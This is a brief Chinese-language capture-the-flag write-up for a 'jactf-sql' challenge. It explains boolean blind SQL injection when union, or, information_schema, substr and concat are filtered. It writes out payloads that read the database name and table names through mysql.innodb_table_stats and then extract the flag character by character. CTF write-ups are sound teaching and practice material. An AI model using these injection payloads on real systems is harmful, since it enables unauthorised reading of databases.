jactf-sql

知识点 

• 布尔盲注

过滤了

union 无法使用联合查询
or information_schema表不能用
sub substr()函数不能用
concat 不能使用报错注入里的concat('~',select database())

关于information_schema表被禁后怎么注入可以参考

https://www.secpulse.com/archives/69983.html
https://www.anquanke.com/post/id/193512
payload

 

查数据库长度 ?id=1 and length(database())=1 这个1可以用burpsuite进行爆破
查数据库名 id=1 and ascii(mid(database(),1,1))=1
数据库名为jactf
查表名由于or被禁导致information_schema表被禁，使用mysql.innodb_table_stats进行代替，但这个东西查不了列名 
id=1 and ascii(mid((select table_name from mysql.innodb_table_stats where database_name=database() limit 0,1),1,1))>1 
查到表名为flag
这里大胆猜测列名为flag
查flag ?id=1 and ascii(mid((select flag from flag),27,1))=1